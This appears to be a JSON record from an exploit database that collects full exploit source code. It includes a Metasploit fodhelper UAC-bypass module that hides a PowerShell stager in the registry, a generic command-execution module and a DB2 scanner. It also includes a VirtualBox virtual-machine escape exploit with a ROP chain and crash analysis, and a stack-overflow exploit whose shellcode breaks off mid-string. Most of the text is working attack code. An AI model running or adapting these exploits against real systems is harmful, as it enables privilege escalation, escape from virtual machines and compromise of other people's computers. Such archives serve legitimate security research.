your\n payload in a separate process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'winscriptingblog', # UAC bypass discovery and research\n 'amaloteaux', # MSF module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/'],\n ['URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'],\n ['URL', 'https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/']\n ],\n 'DisclosureDate' => 'May 12 2017'\n )\n )\n end\n\n def check\n if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n commspec = '%COMSPEC%'\n registry_view = REGISTRY_VIEW_NATIVE\n psh_path = \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"\n\n # Make sure we have a sane payload configuration\n if sysinfo['Architecture'] == ARCH_X64\n if session.arch == ARCH_X86\n # fodhelper.exe is x64 only exe\n commspec = '%WINDIR%\\\\Sysnative\\\\cmd.exe'\n if target_arch.first == ARCH_X64\n # We can't use absolute path here as\n # %WINDIR%\\\\System32 is always converted into %WINDIR%\\\\SysWOW64 from a x86 session\n psh_path = \"powershell.exe\"\n end\n end\n if target_arch.first == ARCH_X86\n # Invoking x86, so switch to SysWOW64\n psh_path = \"%WINDIR%\\\\SysWOW64\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"\n end\n else\n # if we're on x86, we can't handle x64 payloads\n if target_arch.first == ARCH_X64\n fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')\n end\n end\n\n if !payload.arch.empty? && (payload.arch.first != target_arch.first)\n fail_with(Failure::BadConfig, 'payload and target should use the same architecture')\n end\n\n # Validate that we can actually do things before we bother\n # doing any more work\n check_permissions!\n\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\")\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n payload_value = rand_text_alpha(8)\n psh_path = expand_path(psh_path)\n\n template_path = Rex::Powershell::Templates::TEMPLATE_DIR\n psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)\n\n if psh_payload.length > CMD_MAX_LEN\n fail_with(Failure::None, \"Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})\")\n end\n\n psh_stager = \"\\\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\\\"\"\n cmd = \"#{psh_path} -nop -w hidden -c #{psh_stager}\"\n\n existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || \"\"\n exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?\n\n if existing.empty?\n registry_createkey(FODHELPER_WRITE_KEY, registry_view)\n end\n\n print_status(\"Configuring payload and stager registry keys ...\")\n unless exist_delegate\n registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)\n end\n\n registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)\n registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)\n\n # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.\n cmd_path = expand_path(commspec)\n cmd_args = expand_path(\"/c #{FODHELPER_PATH}\")\n print_status(\"Executing payload: #{cmd_path} #{cmd_args}\")\n\n # We can't use cmd_exec here because it blocks, waiting for a result.\n client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })\n\n # Wait a copule of seconds to give the payload a chance to fire before cleaning up\n # TODO: fix this up to use something smarter than a timeout?\n Rex::sleep(5)\n\n handler(client)\n\n print_status(\"Cleaining up registry keys ...\")\n unless exist_delegate\n registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)\n end\n if existing.empty?\n registry_deletekey(FODHELPER_DEL_KEY, registry_view)\n else\n registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)\n end\n registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)\n end\n\n def check_permissions!\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n\n # Check if you are an admin\n vprint_status('Checking admin status...')\n admin_group = is_in_admin_group?\n\n unless check == Exploit::CheckCode::Appears\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n end\n\n unless is_in_admin_group?\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n\n print_status('UAC is Enabled, checking level...')\n if admin_group.nil?\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n else\n if admin_group\n print_good('Part of Administrators group! Continuing...')\n else\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_fodhelper.rb"}, {"lastseen": "2019-11-24T21:38:13", "bulletinFamily": "exploit", "description": "This module executes an arbitrary command line\n", "modified": "2017-07-24T13:26:21", "published": "2012-04-25T17:40:20", "id": "MSF:POST/MULTI/GENERAL/EXECUTE", "href": "", "type": "metasploit", "title": "Multi Generic Operating System Session Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Multi Generic Operating System Session Command Execution',\n 'Description' => %q{ This module executes an arbitrary command line},\n 'License' => MSF_LICENSE,\n 'Author' => [ 'hdm' ],\n 'Platform' => %w{ linux osx unix win },\n 'SessionTypes' => [ 'shell', 'meterpreter' ]\n ))\n register_options(\n [\n OptString.new( 'COMMAND', [false, 'The entire command line to execute on the session'])\n ])\n end\n\n def run\n print_status(\"Executing #{datastore['COMMAND']} on #{session.inspect}...\")\n res = cmd_exec(datastore['COMMAND'])\n print_status(\"Response: #{res}\")\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/multi/general/execute.rb"}, {"lastseen": "2019-11-25T17:23:04", "bulletinFamily": "exploit", "description": "This module simply queries the DB2 discovery service for information.\n", "modified": "2019-03-05T09:38:51", "published": "2009-08-05T21:21:45", "id": "MSF:AUXILIARY/SCANNER/DB2/DISCOVERY", "href": "", "type": "metasploit", "title": "DB2 Discovery Service Detection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Udp\n\n def initialize\n super(\n 'Name' => 'DB2 Discovery Service Detection',\n 'Description' => 'This module simply queries the DB2 discovery service for information.',\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE\n )\n\n register_options([Opt::RPORT(523),])\n end\n\n def run_host(ip)\n\n pkt = \"DB2GETADDR\" + \"\\x00\" + \"SQL05000\" + \"\\x00\"\n\n begin\n\n connect_udp\n udp_sock.put(pkt)\n res = udp_sock.read(1024)\n\n unless res\n print_error(\"Unable to determine version info for #{ip}\")\n return\n end\n\n res = res.split(/\\x00/)\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :port => datastore['RPORT'],\n :type => 'SERVICE_INFO',\n :data => \"#{res[2]}_#{res[1]}\"\n )\n\n report_service(\n :host => ip,\n :port => datastore['RPORT'],\n :proto => 'udp',\n :name => \"ibm-db2\",\n :info => \"#{res[2]}_#{res[1]}\"\n )\n\n print_good(\"Host #{ip} node name is \" + res[2] + \" with a product id of \" + res[1] )\n\n rescue ::Rex::ConnectionError\n rescue ::Errno::EPIPE\n ensure\n disconnect_udp\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/db2/discovery.rb"}], "exploitdb": [{"lastseen": "2016-02-03T20:57:43", "bulletinFamily": "exploit", "description": "VirtualBox 3D Acceleration Virtual Machine Escape. CVE-2014-0983,CVE-2015-4523. Remote exploit for win64 platform", "modified": "2014-08-14T00:00:00", "published": "2014-08-14T00:00:00", "id": "EDB-ID:34334", "href": "https://www.exploit-db.com/exploits/34334/", "type": "exploitdb", "title": "VirtualBox 3D Acceleration Virtual Machine Escape", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n DEVICE = '\\\\\\\\.\\\\VBoxGuest'\r\n INVALID_HANDLE_VALUE = 0xFFFFFFFF\r\n\r\n # VBOX HGCM protocol constants\r\n VBOXGUEST_IOCTL_HGCM_CONNECT = 2269248\r\n VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252\r\n VBOXGUEST_IOCTL_HGCM_CALL = 2269256\r\n CONNECT_MSG_SIZE = 140\r\n DISCONNECT_MSG_SIZE = 8\r\n SET_VERSION_MSG_SIZE = 40\r\n SET_PID_MSG_SIZE = 28\r\n CALL_EA_MSG_SIZE = 40\r\n VERR_WRONG_ORDER = 0xffffffea\r\n SHCRGL_GUEST_FN_SET_PID = 12\r\n SHCRGL_CPARMS_SET_PID = 1\r\n SHCRGL_GUEST_FN_SET_VERSION = 6\r\n SHCRGL_CPARMS_SET_VERSION = 2\r\n SHCRGL_GUEST_FN_INJECT = 9\r\n SHCRGL_CPARMS_INJECT = 2\r\n CR_PROTOCOL_VERSION_MAJOR = 9\r\n CR_PROTOCOL_VERSION_MINOR = 1\r\n VMM_DEV_HGCM_PARM_TYPE_32_BIT = 1\r\n VMM_DEV_HGCM_PARM_TYPE_64_BIT = 2\r\n VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\r\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\r\n sequence of specially crafted of rendering messages, a virtual machine can exploit an out\r\n of bounds array access to corrupt memory and escape to the host. This module has been\r\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Francisco Falcon', # Vulnerability Discovery and PoC\r\n 'Florian Ledoux', # Win 8 64 bits exploitation analysis\r\n 'juan vazquez' # MSF module\r\n ],\r\n 'Arch' => ARCH_X86_64,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => ['meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',\r\n {\r\n :messages => :target_virtualbox_436_win7_64\r\n }\r\n ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 7000,\r\n 'DisableNops' => true\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0983'],\r\n ['BID', '66133'],\r\n ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],\r\n ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],\r\n ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']\r\n ],\r\n 'DisclosureDate' => 'Mar 11 2014',\r\n 'DefaultTarget' => 0\r\n }))\r\n\r\n end\r\n\r\n def open_device\r\n r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0)\r\n\r\n handle = r['return']\r\n\r\n if handle == INVALID_HANDLE_VALUE\r\n return nil\r\n end\r\n\r\n return handle\r\n end\r\n\r\n def send_ioctl(ioctl, msg)\r\n result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\")\r\n\r\n if result[\"GetLastError\"] != 0\r\n unless result[\"ErrorMessage\"].blank?\r\n vprint_error(\"#{result[\"ErrorMessage\"]}\")\r\n end\r\n return nil\r\n end\r\n\r\n unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length\r\n unless result[\"ErrorMessage\"].blank?\r\n vprint_error(\"#{result[\"ErrorMessage\"]}\")\r\n end\r\n return nil\r\n end\r\n\r\n unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0\r\n unless result[\"ErrorMessage\"].blank?\r\n vprint_error(\"#{result[\"ErrorMessage\"]}\")\r\n end\r\n return nil\r\n end\r\n\r\n result\r\n end\r\n\r\n def connect\r\n msg = \"\\x00\" * CONNECT_MSG_SIZE\r\n\r\n msg[4, 4] = [2].pack(\"V\")\r\n msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\"\r\n\r\n result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)\r\n\r\n if result.nil?\r\n return result\r\n end\r\n\r\n client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first\r\n\r\n client_id\r\n end\r\n\r\n def disconnect\r\n msg = \"\\x00\" * DISCONNECT_MSG_SIZE\r\n\r\n msg[4, 4] = [@client_id].pack(\"V\")\r\n\r\n result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)\r\n\r\n result\r\n end\r\n\r\n def set_pid(pid)\r\n msg = \"\\x00\" * SET_PID_MSG_SIZE\r\n\r\n msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")\r\n msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID\r\n msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\")\r\n msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\")\r\n msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\")\r\n msg[20, 4] = [pid].pack(\"V\")\r\n\r\n result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)\r\n\r\n result\r\n end\r\n\r\n def set_version\r\n msg = \"\\x00\" * SET_VERSION_MSG_SIZE\r\n\r\n msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")\r\n msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID\r\n msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\")\r\n msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\")\r\n msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")\r\n msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\")\r\n msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")\r\n msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\")\r\n\r\n result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)\r\n\r\n result\r\n end\r\n\r\n def trigger(buff_addr, buff_length)\r\n msg = \"\\x00\" * CALL_EA_MSG_SIZE\r\n\r\n msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID\r\n msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\")\r\n msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\")\r\n msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")\r\n msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID\r\n msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\")\r\n msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf)\r\n msg[36, 4] = [buff_addr].pack(\"V\") # (buf)\r\n\r\n result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)\r\n\r\n result\r\n end\r\n\r\n def stack_adjustment\r\n pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\" # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB\r\n pivot << \"\\x89\\xc4\" # mov esp, eax # Store stack bottom in esp\r\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # Plus a little offset...\r\n\r\n pivot\r\n end\r\n\r\n def target_virtualbox_436_win7_64(message_id)\r\n opcodes = [0xFF, 0xea, 0x02, 0xf7]\r\n\r\n opcodes_hdr = [\r\n 0x77474c01, # type CR_MESSAGE_OPCODES\r\n 0x8899, # conn_id\r\n opcodes.length # numOpcodes\r\n ]\r\n\r\n if message_id == 2\r\n # Message used to achieve Code execution\r\n # See at the end of the module for a better description of the ROP Chain,\r\n # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\r\n # All gadgets from VBoxREM.dll\r\n opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\")\r\n\r\n opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret\r\n opcodes_data << [112].pack(\"Q<\") # RDX\r\n opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret\r\n opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret\r\n opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret\r\n opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret\r\n opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)\r\n opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp\r\n opcodes_data << Rex::Text.pattern_create(80)\r\n opcodes_data << [0].pack(\"Q<\") # 1st arg (lpAddress) # chain will store stack address here\r\n opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)\r\n opcodes_data << [0x2000].pack(\"Q<\") # 2nd arg (dwSize)\r\n opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)\r\n opcodes_data << [0x40].pack(\"V\") # 3rd arg (flNewProtect)\r\n opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)\r\n opcodes_data << [0x6A70BB20].pack(\"V\") # ptr to jmp VirtualProtect instr.\r\n opcodes_data << \"A\" * 8\r\n opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9\r\n opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10\r\n opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\" # jmp $+608\r\n opcodes_data << \"A\" * (624 - 24 - 5)\r\n opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot\r\n opcodes_data << stack_adjustment\r\n opcodes_data << payload.encoded\r\n opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)\r\n else\r\n # Message used to corrupt head_spu\r\n # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data\r\n # 8196 => On my tests, this data size allows to keep the memory\r\n # not reused until the second packet arrives. The second packet,\r\n # of course, must have 8196 bytes length too. So this memory is\r\n # reused and code execution can be accomplished.\r\n opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\")\r\n opcodes_data << \"B\" * (8196 - opcodes_data.length)\r\n end\r\n\r\n msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data\r\n\r\n msg\r\n end\r\n\r\n def send_opcodes_msg(process, message_id)\r\n msg = self.send(target[:messages], message_id)\r\n\r\n mem = process.memory.allocate(msg.length + (msg.length % 1024))\r\n\r\n process.memory.write(mem, msg)\r\n\r\n trigger(mem, msg.length)\r\n end\r\n\r\n def check\r\n handle = open_device\r\n if handle.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n unless self.respond_to?(target[:messages])\r\n print_error(\"Invalid target specified: no messages callback function defined\")\r\n return\r\n end\r\n\r\n print_status(\"Opening device...\")\r\n @handle = open_device\r\n if @handle.nil?\r\n fail_with(Failure::NoTarget, \"#{DEVICE} device not found\")\r\n else\r\n print_good(\"#{DEVICE} found, exploiting...\")\r\n end\r\n\r\n print_status(\"Connecting to the service...\")\r\n @client_id = connect\r\n if @client_id.nil?\r\n fail_with(Failure::Unknown, \"Connect operation failed\")\r\n end\r\n\r\n print_good(\"Client ID #{@client_id}\")\r\n\r\n print_status(\"Calling SET_VERSION...\")\r\n result = set_version\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"Failed to SET_VERSION\")\r\n end\r\n\r\n this_pid = session.sys.process.getpid\r\n print_status(\"Calling SET_PID...\")\r\n result = set_pid(this_pid)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"Failed to SET_PID\")\r\n end\r\n\r\n this_proc = session.sys.process.open\r\n print_status(\"Sending First 0xEA Opcode Message to control head_spu...\")\r\n result = send_opcodes_msg(this_proc, 1)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"Failed to control heap_spu...\")\r\n end\r\n\r\n print_status(\"Sending Second 0xEA Opcode Message to execute payload...\")\r\n @old_timeout = session.response_timeout\r\n session.response_timeout = 5\r\n begin\r\n send_opcodes_msg(this_proc, 2)\r\n rescue Rex::TimeoutError\r\n vprint_status(\"Expected timeout in case of successful exploitation\")\r\n end\r\n end\r\n\r\n def cleanup\r\n unless @old_timeout.nil?\r\n session.response_timeout = @old_timeout\r\n end\r\n\r\n if session_created?\r\n # Unless we add CoE there is nothing to do\r\n return\r\n end\r\n\r\n unless @client_id.nil?\r\n print_status(\"Disconnecting from the service...\")\r\n disconnect\r\n end\r\n\r\n unless @handle.nil?\r\n print_status(\"Closing the device...\")\r\n session.railgun.kernel32.CloseHandle(@handle)\r\n end\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\n* VirtualBox 4.3.6 / Windows 7 SP1 64 bits\r\n\r\nCrash after second message:\r\n\r\n0:013> dd rax\r\n00000000`0e99bd44 41306141 61413161 33614132 41346141\r\n00000000`0e99bd54 61413561 37614136 41386141 62413961\r\n00000000`0e99bd64 31624130 41326241 62413362 35624134\r\n00000000`0e99bd74 41366241 62413762 39624138 41306341\r\n00000000`0e99bd84 63413163 33634132 41346341 63413563\r\n00000000`0e99bd94 37634136 41386341 64413963 31644130\r\n00000000`0e99bda4 41326441 64413364 35644134 41366441\r\n00000000`0e99bdb4 64413764 39644138 41306541 65413165\r\n0:013> r\r\nrax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba\r\nrdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000\r\nrip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled...\r\n r8=0000000000000001 r9=00000000000005c0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff\r\nr14=000007fef1f90000 r15=0000000002f6e280\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\nVBoxSharedCrOpenGL!crServerAddNewClient+0x208:\r\n000007fe`f12797f8 ff9070030000 call qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541\r\n\r\nGadget 1: Stack Pivot # 0x6a682a2a\r\n\r\n xchg eax,esp 94\r\n ret c3\r\n\r\nGadget 2: Control RDX value # 0x6a68599a\r\n\r\n pop rdx 5a\r\n xor ecx,dword ptr [rax] 33 08\r\n add cl,cl 00 c9\r\n movzx eax,al 0f b6 c0\r\n ret c3\r\n\r\nGadget 3: Store ptr to RSP in RAX # 0x6a70a560\r\n\r\n lea rax,[rsp+8] 48 8d 44 24 08\r\n ret c3\r\n\r\nGadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c\r\n\r\n lea rax,[rdx+rax] 48 8d 04 02\r\n ret c3\r\n\r\nGadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6\r\n\r\n add dword ptr [rax],eax 01 00\r\n add cl,cl 00 c9\r\n ret c3\r\n\r\nGadget 6: Control R12 # 0x6a68124e\r\n\r\npop r12\r\nret\r\n\r\nGadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d\r\n\r\n mov r9,r12 4d 89 e1\r\n mov r8d,dword ptr [rsp+8Ch] 44 8b 84 24 8c 00 00 00\r\n mov rdx,qword ptr [rsp+68h] 48 8b 54 24 68\r\n mov rcx,qword ptr [rsp+50h] 48 8b 4c 24 50\r\n call rbp ff d5\r\n\r\nGadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560\r\n\r\n lea rax, [rsp+8] 48 8d 44 24 08\r\n ret c3\r\n\r\n Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d\r\n\r\n push rax 50\r\n adc cl,ch 10 e9\r\n ret c3\r\n\r\n=end", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34334/"}], "zdt": [{"lastseen": "2017-12-31T21:01:42", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-03-30T00:00:00", "published": "2009-03-30T00:00:00", "id": "1337DAY-ID-7920", "href": "https://0day.today/exploit/description/7920", "type": "zdt", "title": "Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit", "sourceData": "===================================================================\r\nAbee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit\r\n===================================================================\r\n\r\n\r\n# exploit.py\r\n# Abee Chm eBook Creator 2.11 Stack overflow Exploit\r\n# By:Encrypt3d.M!nd\r\n#\r\n# it's the same exploit i wrote for chm maker,everything is the same!!\r\n# but there's a lil note that when importing 'Devil_Inside.chmprj' a message\r\n# will pops up and tells that the project file format is outdated bla bla but after clicking\r\n# ok it will load into the program,and just go to File>Make Ebook.. and calc\r\n# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that\r\n# so i've used the chm maker one :D\r\n\r\nns = \"\\xEB\\x06\\x90\\x90\"\r\nsh = \"\\x05\\x67\\x35\\x45\"\r\n\r\nshellcode = (\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x61\"\r\n\"\\x58\\x30\\x41\\x31\\x50\\x41\\x42\\x6b\\x42\\x41\\x71\\x32\\x42\\x42\\x42\\x32\"\r\n\"\\x41\\x41\\x30\\x41\\x41\\x58\\x38\\x42\\x42\\x50\\x75\\x4d\\x39\\x69\\x6c\\x4d\"\r\n\"\\x38\\x43\\x74\\x35\\x50\\x53\\x30\\x77\\x70\\x4e\\x6b\\x53\\x75\\x77\\x4c\\x4c\"\r\n\"\\x4b\\x63\\x4c\\x54\\x45\\x34\\x38\\x67\\x71\\x5a\\x4f\\x6c\\x4b\\x62\\x6f\\x75\"\r\n\"\\x48\\x6e\\x6b\\x41\\x4f\\x47\\x50\\x33\\x31\\x58\\x6b\\x63\\x79\\x4e\\x6b\\x36\"\r\n\"\\x54\\x4c\\x4b\\x45\\x51\\x68\\x6e\\x34\\x71\\x59\\x50\\x4c\\x59\\x4c\\x6c\\x4f\"\r\n\"\\x74\\x6f\\x30\\x72\\x54\\x47\\x77\\x58\\x41\\x39\\x5a\\x34\\x4d\\x57\\x71\\x69\"\r\n\"\\x52\\x48\\x6b\\x69\\x64\\x67\\x4b\\x46\\x34\\x66\\x44\\x74\\x44\\x53\\x45\\x6b\"\r\n\"\\x55\\x4c\\x4b\\x43\\x6f\\x31\\x34\\x67\\x71\\x78\\x6b\\x63\\